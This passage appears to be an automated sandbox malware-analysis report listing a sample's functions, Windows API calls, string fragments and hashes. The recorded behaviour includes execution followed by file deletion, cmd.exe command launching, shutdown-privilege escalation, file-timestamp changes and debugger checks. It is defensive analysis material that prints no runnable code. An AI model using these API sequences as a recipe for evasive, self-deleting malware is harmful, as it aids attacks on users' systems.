Part of subcall function 0000000180004F20: SHGetPathFromIDListW.SHELL32 ref: 0000000180004F70

Part of subcall function 00000001800015C0: Concurrency::cancel_current_task.LIBCPMT ref: 0000000180001983

Sleep.KERNEL32 ref: 0000000180006F35
ShellExecuteW.SHELL32 ref: 0000000180006F9C
Sleep.KERNEL32 ref: 0000000180006FA3

Part of subcall function 00000001800015C0: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800017CB

Part of subcall function 00000001800044D4: CoInitialize.OLE32 ref: 0000000180004529
Part of subcall function 00000001800044D4: CoImpersonateClient.OLE32 ref: 000000018000452F
Part of subcall function 00000001800044D4: CoInitializeSecurity.OLE32 ref: 000000018000455F
Part of subcall function 00000001800044D4: CLSIDFromProgID.OLE32 ref: 00000001800045CC
Part of subcall function 00000001800044D4: CoCreateInstance.OLE32 ref: 0000000180004637
Part of subcall function 00000001800044D4: VariantInit.OLEAUT32 ref: 0000000180004649

Sleep.KERNEL32 ref: 00000001800070E5

Part of subcall function 00000001800044D4: VariantInit.OLEAUT32 ref: 00000001800047B0

DeleteFileW.KERNEL32 ref: 0000000180007222
DeleteFileW.KERNEL32 ref: 000000018000723F
DeleteFileW.KERNEL32 ref: 000000018000725C

Strings

~m8, xrefs: 00000001800069B8
sta, xrefs: 00000001800063D2
cute, xrefs: 0000000180006762
.0.0, xrefs: 0000000180006417
255, xrefs: 000000018000640D
Dele, xrefs: 000000018000680C
1.0., xrefs: 0000000180006339
tic , xrefs: 00000001800063DC
leW, xrefs: 0000000180006820
Shel, xrefs: 000000018000674E
lExe, xrefs: 0000000180006758
teFi, xrefs: 0000000180006816

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Sleep$DeleteFile$lstrcat$AddressConcurrency::cancel_current_taskCreateExecuteFromInitInitializeLibraryLoadPathProcShellVariant$ClientDirectoryExitFolderImpersonateInstanceListProcessProgSecuritySpecialwsprintf
String ID: 255$ sta$.0.0$1.0.$Dele$Shel$cute$lExe$leW$teFi$tic $~m8
API String ID: 64473743-3965089300
Opcode ID: c5613de24d5e8b30adffa1bfd11ef46f5ebe4553ad626ab9be222fd2b97acba5
Instruction ID: 93e7219765b4098160b17cdbd0ffc818ee925a0a63cda95fe73cbc28c76b516e
Opcode Fuzzy Hash: c5613de24d5e8b30adffa1bfd11ef46f5ebe4553ad626ab9be222fd2b97acba5
Instruction Fuzzy Hash: 3CA22772611BC99AEB72DF30CC943DD3761F789789F809216A65D4AAAADF74C748C300

Function 00000001800075B4 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 476
filestringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 0000000180007645
SHGetSpecialFolderPathW.SHELL32 ref: 00000001800076BE
lstrcatW.KERNEL32 ref: 00000001800076D2
lstrcatW.KERNEL32 ref: 00000001800076E6
lstrcatW.KERNEL32 ref: 00000001800076FA
PathFileExistsW.SHLWAPI ref: 0000000180007D0D
CreateFileW.KERNEL32 ref: 0000000180007D41
CloseHandle.KERNEL32 ref: 0000000180007D50
CreateFileW.KERNEL32 ref: 0000000180007D76
WideCharToMultiByte.KERNEL32 ref: 0000000180007DA8
WideCharToMultiByte.KERNEL32 ref: 0000000180007DDC
WriteFile.KERNEL32 ref: 0000000180007E0A
CloseHandle.KERNEL32 ref: 0000000180007E1B
ShellExecuteExW.SHELL32 ref: 0000000180007E9A
Sleep.KERNEL32 ref: 0000000180007EA5
DeleteFileW.KERNEL32 ref: 0000000180007EB2

Strings

/d 0, xrefs: 0000000180007A95
/t , xrefs: 0000000180007A6A
@, xrefs: 0000000180007E57
/F , xrefs: 0000000180007AAC
/v , xrefs: 00000001800078BC, 00000001800078CB

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: File$lstrcat$ByteCharCloseCreateHandleMultiPathWide$DeleteExecuteExistsFolderShellSleepSpecialWritewsprintf
String ID: /F $ /d 0$ /t $ /v $@
API String ID: 3711553769-2086274384
Opcode ID: 12f081db107600aca863fd5eedb377e52b91212f907b5ac2a20ff6aee5caee70
Instruction ID: 75460cc7f8188bfe70f9382e5ea4320dbf3380ae5ff90c39ed7a51b27fd80bd2
Opcode Fuzzy Hash: 12f081db107600aca863fd5eedb377e52b91212f907b5ac2a20ff6aee5caee70
Instruction Fuzzy Hash: 83325972211AC59EEB62DF20D8583DE37A1F74978DF408215EA4D4BAAADF78C748C740

Function 00000001800044D4 Relevance: 21.4, APIs: 14, Instructions: 393
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32 ref: 0000000180004529
CoImpersonateClient.OLE32 ref: 000000018000452F
CoInitializeSecurity.OLE32 ref: 000000018000455F
CLSIDFromProgID.OLE32 ref: 00000001800045CC
CoCreateInstance.OLE32 ref: 0000000180004637
VariantInit.OLEAUT32 ref: 0000000180004649
VariantInit.OLEAUT32 ref: 00000001800047B0
VariantInit.OLEAUT32 ref: 00000001800048B0
SysAllocString.OLEAUT32 ref: 00000001800048D9
SysAllocString.OLEAUT32 ref: 00000001800048F4
SysAllocString.OLEAUT32 ref: 000000018000490F
SysAllocString.OLEAUT32 ref: 0000000180004929
VariantClear.OLEAUT32 ref: 00000001800049F9
CoUninitialize.OLE32 ref: 0000000180004A2B

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AllocStringVariant$Init$Initialize$ClearClientCreateFromImpersonateInstanceProgSecurityUninitialize
String ID:
API String ID: 3828289656-0
Opcode ID: 801fc1caafe7431574914c1754201faff8d9288c3aba837a6459ff06f367ac15
Instruction ID: 573105a49c2d2260488410611db7ac98c86a9a74392cf804f56a218917ca58b0
Opcode Fuzzy Hash: 801fc1caafe7431574914c1754201faff8d9288c3aba837a6459ff06f367ac15
Instruction Fuzzy Hash: C2027A73610B4885EB42DB65D8943DE3760FB8DBD5F408226EA4D1BBA9DF38C689C344

Function 0000000180017B6C Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000000180017B9B
DuplicateHandle.KERNEL32 ref: 0000000180017BED
CloseHandle.KERNEL32 ref: 0000000180017E13
CloseHandle.KERNEL32 ref: 0000000180017E40
CloseHandle.KERNEL32 ref: 0000000180017E73

Strings

/c , xrefs: 0000000180017CED, 0000000180017D4D
cmd.exe, xrefs: 0000000180017C6D
COMSPEC, xrefs: 0000000180017C39

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Handle$Close$CurrentDuplicateProcess
String ID: /c $COMSPEC$cmd.exe
API String ID: 507262174-3246030452
Opcode ID: 38c44b063460f86156b3e52b7242ab1d82e4023583937fe14ee7208c7443c1b9
Instruction ID: f10c92297a71cabee2056d3bc7fdb9886e5f025a7042322172889677fb9f36bb
Opcode Fuzzy Hash: 38c44b063460f86156b3e52b7242ab1d82e4023583937fe14ee7208c7443c1b9
Instruction Fuzzy Hash: EF91C132301B4886EB96DB25A4513EE33E1B74CBE8F508615FE5E07B96DF38C6598340

Function 0000000180004BFC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000000180004C1D
OpenProcessToken.ADVAPI32 ref: 0000000180004C2F
LookupPrivilegeValueW.ADVAPI32 ref: 0000000180004C4A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000180004C8A
GetLastError.KERNEL32 ref: 0000000180004C94

Part of subcall function 0000000180018E10: _invalid_parameter_noinfo.LIBCMT ref: 0000000180018E34

Sleep.KERNEL32 ref: 0000000180004CC6
CloseHandle.KERNEL32 ref: 0000000180004CD0

Strings

SeShutdownPrivilege, xrefs: 0000000180004C43

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesSleepValue_invalid_parameter_noinfo
String ID: SeShutdownPrivilege
API String ID: 1465265181-3733053543
Opcode ID: a02a20d3ef106207377cf5f22d2c318ef8aa63367dcebb3dcf84bf07a87de06f
Instruction ID: 714bade276c5b322c4beae15e526fd74d3d41e7a40324bd374856c1e015a790a
Opcode Fuzzy Hash: a02a20d3ef106207377cf5f22d2c318ef8aa63367dcebb3dcf84bf07a87de06f
Instruction Fuzzy Hash: C6219272B10A088AF792CBB1D8553EE33B0B74C79DF008126DE0A5A698CF38C28DC704

Function 0000000180023430 Relevance: 10.8, APIs: 7, Instructions: 286
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180023862

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1ff4ca5376e79e2f0226cf16d9ae6b534f9b7ebb015540c369264cd4a1b664f2
Instruction ID: 552021de668f097bd5bf1f44fce14493afff49fbc9d57b10b79a5ff25d345989
Opcode Fuzzy Hash: 1ff4ca5376e79e2f0226cf16d9ae6b534f9b7ebb015540c369264cd4a1b664f2
Instruction Fuzzy Hash: 91C1DF72204B8CA6EBE39B55944A3EE67A5F788BC4F45C105FA4A077D1CFB8C65C8700

Function 00000001800073BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00000001800073DA
GlobalMemoryStatusEx.KERNEL32 ref: 00000001800073F4

Strings

@, xrefs: 00000001800073EC

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: GlobalInfoMemoryStatusSystem
String ID: @
API String ID: 248183744-2766056989
Opcode ID: 84e926ca72d46586985b568352741ec882d40f0f462808b4096a246755bcb75a
Instruction ID: e6d19e41b513e3daed8fca7d46ad1fc86713ce1a4f3c4f7869d0d113d1a15d8e
Opcode Fuzzy Hash: 84e926ca72d46586985b568352741ec882d40f0f462808b4096a246755bcb75a
Instruction Fuzzy Hash: 8EF0823271468487EBA2DB20F4563AAB360F7CD794F804116EB8E41A95CF7CC24DCB00

Function 000000018000A870 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 259
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 000000018000AAC0
wsprintfW.USER32 ref: 000000018000AAE0
CreateFileW.KERNEL32 ref: 000000018000AB21
WriteFile.KERNEL32 ref: 000000018000ABA2
SetFileTime.KERNEL32 ref: 000000018000ABDD
CloseHandle.KERNEL32 ref: 000000018000ABF2

Strings

%s%s%s, xrefs: 000000018000AAB2
%s%s, xrefs: 000000018000AAD2

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite
String ID: %s%s$%s%s%s
API String ID: 1593831391-1506711308
Opcode ID: d4f33ccd2a038503880be557cbc0f422a7c8262e8462d13f395053426f004821
Instruction ID: 2686955042cfdf0216405c2fddede1ffb79212d64e9dcbe5beb1ad0312999838
Opcode Fuzzy Hash: d4f33ccd2a038503880be557cbc0f422a7c8262e8462d13f395053426f004821
Instruction Fuzzy Hash: 95B18C322086898AFBA6DB25D5503EA33A0F34EBD4F50C126EB59476D5DF34CB5AC301

Function 000000018002D2F8 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018002D028: _invalid_parameter_noinfo.LIBCMT ref: 000000018002D069
Part of subcall function 000000018002D028: _invalid_parameter_noinfo.LIBCMT ref: 000000018002D0E9
Part of subcall function 000000018002D028: _invalid_parameter_noinfo.LIBCMT ref: 000000018002D13D
Part of subcall function 000000018002D028: _get_daylight.LIBCMT ref: 000000018002D195

CreateFileW.KERNEL32 ref: 000000018002D3FE
CreateFileW.KERNEL32 ref: 000000018002D44E
GetLastError.KERNEL32 ref: 000000018002D47E
GetFileType.KERNEL32 ref: 000000018002D493
GetLastError.KERNEL32 ref: 000000018002D49D
CloseHandle.KERNEL32 ref: 000000018002D4D0
CloseHandle.KERNEL32 ref: 000000018002D634
CreateFileW.KERNEL32 ref: 000000018002D669
GetLastError.KERNEL32 ref: 000000018002D678

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: 1a25c0d1fd3bfd2fc87dba1621445f8bbacfd26f609d8afd724ba73d8b012311
Instruction ID: cf7d08cdbf223275b32a2311082e09d3531cd8b8de5b4a5aabe58beb1422b91e
Opcode Fuzzy Hash: 1a25c0d1fd3bfd2fc87dba1621445f8bbacfd26f609d8afd724ba73d8b012311
Instruction Fuzzy Hash: EDC19F36720A4886EB92CFA9D4947DD3761F34DBE8F018216EA2A977D4CF74C659C300

Function 00000001800245BC Relevance: 10.7, APIs: 7, Instructions: 174
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001800245F4
_invalid_parameter_noinfo.LIBCMT ref: 0000000180024639
CreatePipe.KERNEL32 ref: 000000018002467F
GetLastError.KERNEL32 ref: 0000000180024689
CloseHandle.KERNEL32 ref: 00000001800246C0
CloseHandle.KERNEL32 ref: 00000001800246CB
_get_daylight.LIBCMT ref: 00000001800247A5

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CloseHandle_invalid_parameter_noinfo$CreateErrorLastPipe_get_daylight
String ID:
API String ID: 2469496653-0
Opcode ID: 0b908156909fb84df3b336cb7f45ff0f655c09e1f266d298a1b3d26f314a4635
Instruction ID: 9ab5974e1d2c840e8fbcaa6b593ca0a3f65945247d9427bf9519bcb603b2eea7
Opcode Fuzzy Hash: 0b908156909fb84df3b336cb7f45ff0f655c09e1f266d298a1b3d26f314a4635
Instruction Fuzzy Hash: 6A719C72224A8892EB92DF69D8443DE2B60E389BD4F118215FA4A4B7A1DF38C649C711

Function 0000000180018E10 Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180018E34
CreateThread.KERNEL32 ref: 0000000180018E75
GetLastError.KERNEL32 ref: 0000000180018E83
CloseHandle.KERNEL32 ref: 0000000180018EA0
FreeLibrary.KERNEL32 ref: 0000000180018EAF

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 0d9d6a7a5726074c34e8d0d1f4529f909fc1424790298e38c727ecd516585ed1
Instruction ID: 12737f411e7e1cf6fa5e52e191477aea7fb7eae0c348a13b6a3526cfdce42438
Opcode Fuzzy Hash: 0d9d6a7a5726074c34e8d0d1f4529f909fc1424790298e38c727ecd516585ed1
Instruction Fuzzy Hash: 84215C35205B4886EF9BDB65A4143EA63E1AF8CBD0F188825FE4A43B95DF3CC7089700

Function 0000000180009F48 Relevance: 6.1, APIs: 4, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 0000000180009F76
CreateDirectoryW.KERNEL32 ref: 0000000180009F86
GetFileAttributesW.KERNEL32 ref: 000000018000A024
CreateDirectoryW.KERNEL32 ref: 000000018000A036

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 7815d2c84b0fed0335fd76532c423a9c3957b7b80f1c8f39c2d93c2d788e27c1
Instruction ID: 218b208b423e143f71806dfc3f6ffe5c5a48fff2784f5452fec044fc15edd28a
Opcode Fuzzy Hash: 7815d2c84b0fed0335fd76532c423a9c3957b7b80f1c8f39c2d93c2d788e27c1
Instruction Fuzzy Hash: 5221C33521594841FEB2D765E4543FAB360BB8CBD4F488120FF9946AD5DE2CC609C704

Function 0000000180023FEC Relevance: 6.1, APIs: 4, Instructions: 53
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32 ref: 000000018002401C
GetExitCodeProcess.KERNEL32 ref: 000000018002402E
GetLastError.KERNEL32 ref: 0000000180024048
CloseHandle.KERNEL32 ref: 000000018002407C

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID:
API String ID: 2321548817-0
Opcode ID: 26369f207304a3a4eb36f8971b1d50db89a1ecb600855df9ebcd80be048494c3
Instruction ID: bf86fecbd73a39524917c0fb1e126dfb34c6ddfd28f68d5883d0ea50a007c6d7
Opcode Fuzzy Hash: 26369f207304a3a4eb36f8971b1d50db89a1ecb600855df9ebcd80be048494c3
Instruction Fuzzy Hash: 3F118B3260568886FBD79F6594403ED63A0AB4DBE0F08C610FB264B6D4DF78CB8A8701

Function 000000018000CFAC Relevance: 4.6, APIs: 3, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 000000018000D022
SetFilePointer.KERNEL32 ref: 000000018000D04C
SetFilePointer.KERNEL32 ref: 000000018000D0AF

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 63c1da646bd38b41013fe3ffef9690c3b05cb5bdb3a39ed47ad85da9e21afdc5
Instruction ID: 28d61b3b080624d32d11d3a3cedd0b823d406c420ba7b9be128570eabed745d6
Opcode Fuzzy Hash: 63c1da646bd38b41013fe3ffef9690c3b05cb5bdb3a39ed47ad85da9e21afdc5
Instruction Fuzzy Hash: D131E53251479886E3A2CF26A44079E7FA0F388BE0F54C21AEF5503B90DF79C64AC751

Function 0000000180018D48 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018001E8A0: GetLastError.KERNEL32 ref: 000000018001E8AF
Part of subcall function 000000018001E8A0: SetLastError.KERNEL32 ref: 000000018001E94F

CloseHandle.KERNEL32 ref: 0000000180018D83
FreeLibraryAndExitThread.KERNEL32 ref: 0000000180018D99
ExitThread.KERNEL32 ref: 0000000180018DA2

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: cd62f93f4177a4893dbb9f0bb8911854dd9ceeafd4a7f2074f1ff998cca59af7
Instruction ID: 29440b3ad1ab096661f3ac28fc7f1df91acb9383f013401940a2ea590955c663
Opcode Fuzzy Hash: cd62f93f4177a4893dbb9f0bb8911854dd9ceeafd4a7f2074f1ff998cca59af7
Instruction Fuzzy Hash: C1F04431200B8C95EB9B5B6094443ED23A5EB9DBB5F688B15A738076D4DF34CB498341

Function 0000000180004FBC Relevance: 4.5, APIs: 3, Instructions: 25sleepCOMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 0000000180004FC2
Sleep.KERNEL32 ref: 0000000180004FD0
SleepEx.KERNEL32 ref: 0000000180004FD6

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Sleep$Count64Tick
String ID:
API String ID: 2406120688-0
Opcode ID: 988f5a1ec5ca7fc1aa32ed168a822a2bb7b683a27a4a414c488008b7cf8a1d28
Instruction ID: dc04b3bd82e00ba80485c895dca742a58086082a151d7b71af77049a3f1a5cb7
Opcode Fuzzy Hash: 988f5a1ec5ca7fc1aa32ed168a822a2bb7b683a27a4a414c488008b7cf8a1d28
Instruction Fuzzy Hash: 1FE0D864B1050946F79A27B5AC893D512828B9C371F14C234A926096D5DE3856CD0300

Function 0000000180008100 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008AF0: IsDebuggerPresent.KERNEL32 ref: 0000000180008AF4

CreateMutexW.KERNEL32 ref: 0000000180008114
GetLastError.KERNEL32 ref: 000000018000811F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CreateDebuggerErrorLastMutexPresent
String ID:
API String ID: 1687116478-0
Opcode ID: a4360c5aae07ef295ea75f41278b0407774a7c3ed11de9fdc780b54ec0e2318e
Instruction ID: acbf590ba7c79c44c5546926fbdc27d25e048bbe93ffc16a5b4841122e7aa791
Opcode Fuzzy Hash: a4360c5aae07ef295ea75f41278b0407774a7c3ed11de9fdc780b54ec0e2318e
Instruction Fuzzy Hash: 7AE01771A0164C81FADBF7B158063DE32927F4D7C2F85C929F186001E38F28434E83A2

Function 00000001800214F8 Relevance: 2.6, APIs: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0000000180021566
GetLastError.KERNEL32 ref: 0000000180021570

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: a06c28f5000c5f0c91bbd4b7b0e5c57a49f0af3656d61e4c1682c96ff0b12bf7
Instruction ID: 27804a3bc8a991570a3f6cdbd133cdde9159f9fbdc9bb6827f22e357b3757e49
Opcode Fuzzy Hash: a06c28f5000c5f0c91bbd4b7b0e5c57a49f0af3656d61e4c1682c96ff0b12bf7
Instruction Fuzzy Hash: 6421D231714A9885FFD79764A4853FD1382A79C7E5F08C269FA2A473C6CE68CA898301

Function 0000000180020390 Relevance: 2.5, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00000001800203A6
GetLastError.KERNEL32 ref: 00000001800203B0

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: bf97634e25c794e803d8c98c7461c3baf430e1edc199995cc504504dee553771
Instruction ID: 20681907d06a188040083742e271d61785e95bd85784d6e5cc8f9fa572c81fea
Opcode Fuzzy Hash: bf97634e25c794e803d8c98c7461c3baf430e1edc199995cc504504dee553771
Instruction Fuzzy Hash: 5DE01D7071264C47FF9BABF154593E913955B4C7D1F04D825AD0596292DF3C474D8710

Function 0000000180024168 Relevance: 1.7, APIs: 1, Instructions: 181processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00000001800243C3

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5b076a854e752f7bcdeb314fd77e739853af4e1135fb25d819a3e7f252135b45
Instruction ID: df5351df7058836270bd9f06f760cadbb4c7d2ab067293224713c1201260d724
Opcode Fuzzy Hash: 5b076a854e752f7bcdeb314fd77e739853af4e1135fb25d819a3e7f252135b45
Instruction Fuzzy Hash: 248152376047848AE7A3CB66E4803DE7BA4F3897D8F148115FE9817BA9DF74C6598700

Function 000000018000D164 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32 ref: 000000018000D19E

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8c9508e488aa075d5b1fbcfff6974e5f12ced9c718e677f61efc8058a9cf6934
Instruction ID: 3fd0d0d7384b659236a0bfe8070189c08b348f0ce3cbfed5085867cb106e796b
Opcode Fuzzy Hash: 8c9508e488aa075d5b1fbcfff6974e5f12ced9c718e677f61efc8058a9cf6934
